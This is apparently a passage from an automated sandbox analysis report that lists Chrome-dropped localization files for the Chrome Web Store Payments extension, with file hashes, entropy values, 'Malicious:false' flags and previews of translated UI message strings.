                                                                                                                                                                                SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                                                                                                                                                SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):671
                                                                                                                                                                                Entropy (8bit):4.631774066483956
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                                                                                                                                                MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                                                                                                                                                SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                                                                                                                                                SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
                                                                                                                                                                                SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):624
                                                                                                                                                                                Entropy (8bit):4.555032032637389
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
                                                                                                                                                                                MD5:93C459A23BC6953FF744C35920CD2AF9
                                                                                                                                                                                SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                                                                                                                                                SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                                                                                                                                                SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):615
                                                                                                                                                                                Entropy (8bit):4.4715318546237315
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                                                                                                                                                MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                                                                                                                                                SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                                                                                                                                                SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                                                                                                                                                SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):636
                                                                                                                                                                                Entropy (8bit):4.646901997539488
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                                                MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                                                SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                                                SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                                                SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\pt_BR\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):636
                                                                                                                                                                                Entropy (8bit):4.515158874306633
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                                                MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                                                SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                                                SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                                                SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\pt_PT\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):622
                                                                                                                                                                                Entropy (8bit):4.526171498622949
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                                                                                                                                                MD5:750A4800EDB93FBE56495963F9FB3B94
                                                                                                                                                                                SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                                                SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                                                SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):641
                                                                                                                                                                                Entropy (8bit):4.61125938671415
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                                                                                                                                                MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                                                SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                                                SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                                                SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):744
                                                                                                                                                                                Entropy (8bit):4.918620852166656
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                                                                                                                                                MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                                                SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                                                SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                                                SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):647
                                                                                                                                                                                Entropy (8bit):4.640777810668463
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                                                                                                                                                MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                                                SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                                                SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                                                SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):617
                                                                                                                                                                                Entropy (8bit):4.5101656584816885
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                                                                                                                                                MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                                                SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                                                SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                                                SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):743
                                                                                                                                                                                Entropy (8bit):4.913927107235852
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                                                                                                                                                MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                                                SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                                                SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                                                SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):630
                                                                                                                                                                                Entropy (8bit):4.52964089437422
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
                                                                                                                                                                                MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                                                SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                                                SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                                                SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):945
                                                                                                                                                                                Entropy (8bit):4.801079428724355
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
                                                                                                                                                                                MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                                                SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                                                SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                                                SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):631
                                                                                                                                                                                Entropy (8bit):4.710869622361971
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
                                                                                                                                                                                MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                                                SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                                                SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                                                SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):720
                                                                                                                                                                                Entropy (8bit):4.977397623063544
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
                                                                                                                                                                                MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                                                SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                                                SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                                                SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):695
                                                                                                                                                                                Entropy (8bit):4.855375139026009
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
                                                                                                                                                                                MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                                                SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                                                SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
                                                                                                                                                                                SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_1689476261\CRX_INSTALL\_locales\zh_CN\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
